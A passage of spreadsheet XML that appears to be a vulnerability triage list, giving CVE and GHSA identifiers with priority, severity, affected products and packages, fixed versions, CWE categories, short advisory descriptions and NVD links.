      </c>
      <c r="I1465" s="5" t="inlineStr"/>
      <c r="J1465" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1465" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1465" s="5" t="inlineStr"/>
      <c r="M1465" s="5" t="inlineStr"/>
      <c r="N1465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1465" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1465" s="5" t="inlineStr"/>
      <c r="Q1465" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1465"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S1465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t>
        </is>
      </c>
    </row>
    <row r="1466">
      <c r="A1466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1466" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83940</t>
        </is>
      </c>
      <c r="D1466" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1466" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1466" s="5" t="inlineStr"/>
      <c r="H1466" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1466" s="5" t="inlineStr"/>
      <c r="J1466" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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66" s="5" t="inlineStr"/>
      <c r="M1466" s="5" t="inlineStr"/>
      <c r="N1466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1466" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1466" s="5" t="inlineStr"/>
      <c r="Q1466" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1466" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t>
        </is>
      </c>
    </row>
    <row r="1467">
      <c r="A1467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83999</t>
        </is>
      </c>
      <c r="D1467" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1467" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1467" s="5" t="inlineStr"/>
      <c r="H1467" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1467" s="5" t="inlineStr"/>
      <c r="J1467" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1467" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1467" s="5" t="inlineStr"/>
      <c r="M1467" s="5" t="inlineStr"/>
      <c r="N1467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1467" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1467" s="5" t="inlineStr"/>
      <c r="Q1467" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R1467" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t>
        </is>
      </c>
    </row>
    <row r="1468">
      <c r="A1468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1468" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85360</t>
        </is>
      </c>
      <c r="D1468" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1468" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1468" s="5" t="inlineStr"/>
      <c r="H1468" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1468" s="5" t="inlineStr"/>
      <c r="J1468" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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68" s="5" t="inlineStr"/>
      <c r="M1468" s="5" t="inlineStr"/>
      <c r="N1468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1468" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1468" s="5" t="inlineStr"/>
      <c r="Q1468" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1468" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t>
        </is>
      </c>
    </row>
    <row r="1469">
      <c r="A1469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1469" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86135</t>
        </is>
      </c>
      <c r="D1469" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1469" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G1469" s="5" t="inlineStr"/>
      <c r="H1469" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1469" s="5" t="inlineStr"/>
      <c r="J1469" s="5" t="inlineStr"/>
      <c r="K1469" s="5" t="inlineStr"/>
      <c r="L1469" s="5" t="inlineStr"/>
      <c r="M1469" s="5" t="inlineStr"/>
      <c r="N1469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1469" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1469" s="5" t="inlineStr"/>
      <c r="Q1469" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-400</t>
        </is>
      </c>
      <c r="R1469" s="5" t="inlineStr">
        <is>
          <t>A Cross-Site Request Forgery (CSRF) vulnerability in WatchGuard Dimension's database snapshot creation feature allows a remote attacker to trigger unauthorized snapshot creation by tricking an authenticated administrator into visiting a specially crafted web page.</t>
        </is>
      </c>
      <c r="S1469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86135</t>
        </is>
      </c>
    </row>
    <row r="1470">
      <c r="A1470" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1470" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50646</t>
        </is>
      </c>
      <c r="D1470" s="5" t="inlineStr"/>
      <c r="E1470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1470" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1470" s="5" t="inlineStr"/>
      <c r="H1470" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I1470" s="5" t="inlineStr"/>
      <c r="J1470" s="5" t="inlineStr"/>
      <c r="K1470" s="5" t="inlineStr"/>
      <c r="L1470" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.WindowsDesktop.App.Runtime.win-arm64, nuget:Microsoft.WindowsDesktop.App.Runtime.win-x64, nuget:Microsoft.WindowsDesktop.App.Runtime.win-x86</t>
        </is>
      </c>
      <c r="M1470" s="5" t="inlineStr">
        <is>
          <t>10.0.10, 8.0.29, 9.0.18</t>
        </is>
      </c>
      <c r="N1470" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1470" s="5" t="inlineStr"/>
      <c r="P1470" s="5" t="inlineStr"/>
      <c r="Q1470" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-693</t>
        </is>
      </c>
      <c r="R1470" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50646</t>
        </is>
      </c>
    </row>
    <row r="1471">
      <c r="A1471" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1471" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69222</t>
        </is>
      </c>
      <c r="D1471" s="5" t="inlineStr"/>
      <c r="E1471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1471" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1471" s="5" t="inlineStr"/>
      <c r="H1471" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1471" s="5" t="inlineStr"/>
      <c r="J1471" s="5" t="inlineStr"/>
      <c r="K1471" s="5" t="inlineStr"/>
      <c r="L1471" s="5" t="inlineStr">
        <is>
          <t>npm:liquidjs</t>
        </is>
      </c>
      <c r="M1471" s="5" t="inlineStr">
        <is>
          <t>10.27.2</t>
        </is>
      </c>
      <c r="N1471" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1471" s="5" t="inlineStr"/>
      <c r="P1471" s="5" t="inlineStr"/>
      <c r="Q1471" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R1471" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t>
        </is>
      </c>
    </row>
    <row r="1472">
      <c r="A1472" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1472" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72789</t>
        </is>
      </c>
      <c r="D1472" s="5" t="inlineStr"/>
      <c r="E1472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1472" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1472" s="5" t="inlineStr"/>
      <c r="H1472" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1472" s="5" t="inlineStr"/>
      <c r="J1472" s="5" t="inlineStr"/>
      <c r="K1472" s="5" t="inlineStr"/>
      <c r="L1472" s="5" t="inlineStr">
        <is>
          <t>go:github.com/siyuan-note/siyuan/kernel</t>
        </is>
      </c>
      <c r="M1472" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260726020813-a25c2dd06aae</t>
        </is>
      </c>
      <c r="N1472" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1472" s="5" t="inlineStr"/>
      <c r="P1472" s="5" t="inlineStr"/>
      <c r="Q1472" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1472" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72789</t>
        </is>
      </c>
    </row>
    <row r="1473">
      <c r="A1473" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1473" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73294</t>
        </is>
      </c>
      <c r="D1473" s="5" t="inlineStr"/>
      <c r="E1473" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1473" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1473" s="5" t="inlineStr"/>
      <c r="H1473" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1473" s="5" t="inlineStr"/>
      <c r="J1473" s="5" t="inlineStr"/>
      <c r="K1473" s="5" t="inlineStr"/>
      <c r="L1473" s="5" t="inlineStr">
        <is>
          <t>go:github.com/semaphoreui/semaphore</t>
        </is>
      </c>
      <c r="M1473" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260704181911-7e8a9434bd81</t>
        </is>
      </c>
      <c r="N1473" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1473" s="5" t="inlineStr"/>
      <c r="P1473" s="5" t="inlineStr"/>
      <c r="Q1473" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="R1473" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73294</t>
        </is>
      </c>
    </row>
    <row r="1474">
      <c r="A1474" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1474" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75604</t>
        </is>
      </c>
      <c r="D1474" s="5" t="inlineStr"/>
      <c r="E1474" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1474" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1474" s="5" t="inlineStr"/>
      <c r="H1474" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="I1474" s="5" t="inlineStr"/>
      <c r="J1474" s="5" t="inlineStr"/>
      <c r="K1474" s="5" t="inlineStr"/>
      <c r="L1474" s="5" t="inlineStr">
        <is>
          <t>npm:next</t>
        </is>
      </c>
      <c r="M1474" s="5" t="inlineStr">
        <is>
          <t>15.5.24, 16.3.3</t>
        </is>
      </c>
      <c r="N1474" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1474" s="5" t="inlineStr"/>
      <c r="P1474" s="5" t="inlineStr"/>
      <c r="Q1474" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1474" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t>
        </is>
      </c>
    </row>
    <row r="1475">
      <c r="A1475" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1475" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77037</t>
        </is>
      </c>
      <c r="D1475" s="5" t="inlineStr"/>
      <c r="E1475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1475" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1475" s="5" t="inlineStr"/>
      <c r="H1475" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1475" s="5" t="inlineStr"/>
      <c r="J1475" s="5" t="inlineStr"/>
      <c r="K1475" s="5" t="inlineStr"/>
      <c r="L1475" s="5" t="inlineStr">
        <is>
          <t>npm:multer</t>
        </is>
      </c>
      <c r="M1475" s="5" t="inlineStr">
        <is>
          <t>2.3.0</t>
        </is>
      </c>
      <c r="N1475" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1475" s="5" t="inlineStr"/>
      <c r="P1475" s="5" t="inlineStr"/>
      <c r="Q1475" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-459</t>
        </is>
      </c>
      <c r="R1475" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77037</t>
        </is>
      </c>
    </row>
    <row r="1476">
      <c r="A1476" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1476" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77078</t>
        </is>
      </c>
      <c r="D1476" s="5" t="inlineStr"/>
      <c r="E1476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1476" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1476" s="5" t="inlineStr"/>
      <c r="H1476" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1476" s="5" t="inlineStr"/>
      <c r="J1476" s="5" t="inlineStr"/>
      <c r="K1476" s="5" t="inlineStr"/>
      <c r="L1476" s="5" t="inlineStr">
        <is>
          <t>npm:multer</t>
        </is>
      </c>
      <c r="M1476" s="5" t="inlineStr">
        <is>
          <t>2.3.0</t>
        </is>
      </c>
      <c r="N1476" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1476" s="5" t="inlineStr"/>
      <c r="P1476" s="5" t="inlineStr"/>
      <c r="Q1476" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R1476" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77078</t>
        </is>
      </c>
    </row>
    <row r="1477">
      <c r="A1477" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1477" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82333</t>
        </is>
      </c>
      <c r="D1477" s="5" t="inlineStr"/>
      <c r="E1477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1477" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1477" s="5" t="inlineStr"/>
      <c r="H1477" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1477" s="5" t="inlineStr"/>
      <c r="J1477" s="5" t="inlineStr"/>
      <c r="K1477" s="5" t="inlineStr"/>
      <c r="L1477" s="5" t="inlineStr">
        <is>
          <t>npm:multer</t>
        </is>
      </c>
      <c r="M1477" s="5" t="inlineStr">
        <is>
          <t>2.3.0</t>
        </is>
      </c>
      <c r="N1477" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1477" s="5" t="inlineStr"/>
      <c r="P1477" s="5" t="inlineStr"/>
      <c r="Q1477" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R1477" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82333</t>
        </is>
      </c>
    </row>
    <row r="1478">
      <c r="A1478" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1478" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84370</t>
        </is>
      </c>
      <c r="D1478" s="5" t="inlineStr"/>
      <c r="E1478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1478" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1478" s="5" t="inlineStr"/>
      <c r="H1478" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1478" s="5" t="inlineStr"/>
      <c r="J1478" s="5" t="inlineStr"/>
      <c r="K1478" s="5" t="inlineStr"/>
      <c r="L1478" s="5" t="inlineStr">
        <is>
          <t>npm:svgo</t>
        </is>
      </c>
      <c r="M1478" s="5" t="inlineStr">
        <is>
          <t>2.8.4, 3.3.5, 4.1.0</t>
        </is>
      </c>
      <c r="N1478" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1478" s="5" t="inlineStr"/>
      <c r="P1478" s="5" t="inlineStr"/>
      <c r="Q1478" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-184</t>
        </is>
      </c>
      <c r="R1478" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t>
        </is>
      </c>
    </row>
    <row r="1479">
      <c r="A1479" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1479" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84375</t>
        </is>
      </c>
      <c r="D1479" s="5" t="inlineStr"/>
      <c r="E1479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1479" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1479" s="5" t="inlineStr"/>
      <c r="H1479" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1479" s="5" t="inlineStr"/>
      <c r="J1479" s="5" t="inlineStr"/>
      <c r="K1479" s="5" t="inlineStr"/>
      <c r="L1479" s="5" t="inlineStr">
        <is>
          <t>npm:js-yaml</t>
        </is>
      </c>
      <c r="M1479" s="5" t="inlineStr">
        <is>
          <t>3.15.2, 4.3.2</t>
        </is>
      </c>
      <c r="N1479" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1479" s="5" t="inlineStr"/>
      <c r="P1479" s="5" t="inlineStr"/>
      <c r="Q1479" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="R1479" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t>
        </is>
      </c>
    </row>
    <row r="1480">
      <c r="A1480" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1480" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84381</t>
        </is>
      </c>
      <c r="D1480" s="5" t="inlineStr"/>
      <c r="E1480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1480" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1480" s="5" t="inlineStr"/>
      <c r="H1480" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1480" s="5" t="inlineStr"/>
      <c r="J1480" s="5" t="inlineStr"/>
      <c r="K1480" s="5" t="inlineStr"/>
      <c r="L1480" s="5" t="inlineStr">
        <is>
          <t>pip:httpcore2, pip:httpx2</t>
        </is>
      </c>
      <c r="M1480" s="5" t="inlineStr">
        <is>
          <t>2.10.0</t>
        </is>
      </c>
      <c r="N1480" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1480" s="5" t="inlineStr"/>
      <c r="P1480" s="5" t="inlineStr"/>
      <c r="Q1480" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R1480" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t>
        </is>
      </c>
    </row>
    <row r="1481">
      <c r="A1481" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1481" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84382</t>
        </is>
      </c>
      <c r="D1481" s="5" t="inlineStr"/>
      <c r="E1481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1481" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1481" s="5" t="inlineStr"/>
      <c r="H1481" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1481" s="5" t="inlineStr"/>
      <c r="J1481" s="5" t="inlineStr"/>
      <c r="K1481" s="5" t="inlineStr"/>
      <c r="L1481" s="5" t="inlineStr">
        <is>
          <t>pip:httpx2</t>
        </is>
      </c>
      <c r="M1481" s="5" t="inlineStr">
        <is>
          <t>2.12.0</t>
        </is>
      </c>
      <c r="N1481" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1481" s="5" t="inlineStr"/>
      <c r="P1481" s="5" t="inlineStr"/>
      <c r="Q1481" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R1481" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t>
        </is>
      </c>
    </row>
    <row r="1482">
      <c r="A1482" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1482" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85061</t>
        </is>
      </c>
      <c r="D1482" s="5" t="inlineStr"/>
      <c r="E1482" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1482" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1482" s="5" t="inlineStr"/>
      <c r="H1482" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1482" s="5" t="inlineStr"/>
      <c r="J1482" s="5" t="inlineStr"/>
      <c r="K1482" s="5" t="inlineStr"/>
      <c r="L1482" s="5" t="inlineStr">
        <is>
          <t>npm:maplibre-gl</t>
        </is>
      </c>
      <c r="M1482" s="5" t="inlineStr">
        <is>
          <t>6.4.1</t>
        </is>
      </c>
      <c r="N1482" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1482" s="5" t="inlineStr"/>
      <c r="P1482" s="5" t="inlineStr"/>
      <c r="Q1482" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1482" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t>
        </is>
      </c>
    </row>
    <row r="1483">
      <c r="A1483" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1483" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1483" s="5" t="inlineStr">
        <is>
          <t>GHSA-26w7-cxv4-gfx2</t>
        </is>
      </c>
      <c r="D1483" s="5" t="inlineStr"/>
      <c r="E1483" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1483" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1483" s="5" t="inlineStr"/>
      <c r="H1483" s="5" t="inlineStr"/>
      <c r="I1483" s="5" t="inlineStr"/>
      <c r="J1483" s="5" t="inlineStr"/>
      <c r="K1483" s="5" t="inlineStr"/>
      <c r="L1483" s="5" t="inlineStr">
        <is>
          <t>npm:astro</t>
        </is>
      </c>
      <c r="M1483" s="5" t="inlineStr">
        <is>
          <t>7.2.8</t>
        </is>
      </c>
      <c r="N1483" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1483" s="5" t="inlineStr"/>
